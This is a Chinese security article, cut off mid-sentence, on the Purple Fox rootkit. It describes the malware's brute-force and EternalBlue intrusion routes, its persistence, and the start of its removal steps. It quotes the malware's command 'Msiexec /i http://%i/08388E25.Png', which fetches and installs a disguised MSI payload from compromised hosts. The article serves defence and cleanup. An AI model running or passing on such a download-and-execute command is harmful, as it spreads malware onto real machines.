木马病毒清除方式
紫狐(Purple Fox)Rootkit木马病毒,最早在2018年被网络安全人员发现,该恶意软件存在多种蠕虫化传播方式并使用驱动级维权方式,难清除是安全从业人员遇到最大的问题,在这里我们给大家提供一些入侵方式解读及清除方式。
入侵方式:
使用较为通用的SMB爆破、Sqlserver爆破、永恒之蓝等高危漏洞或爆破手段入侵。
执行方式:
创建一个恶意服务,然后使用Msiexec命令去公网上其他失陷地址中下载shellcode,形如:do Msiexec /i http://%i/08388E25.Png,下载的恶意软件通常是png后缀但实际为MSI格式文件,将shellcode加载到服务中后会将机器进行重启,从而将服务注册为Windows系统驱动,使服务做到隐藏效果(下图为现场取证时发现的隐藏服务,有意思的是可能由于程序的运行错误导致将一些正常服务也一并进行隐藏了),后续将使用SMB等入侵手段再次进行蠕虫。
清除方式:
-
安全模式启动 因为恶意的dll为ring-3级别的,正常情况下相关的dll无法直接删除&#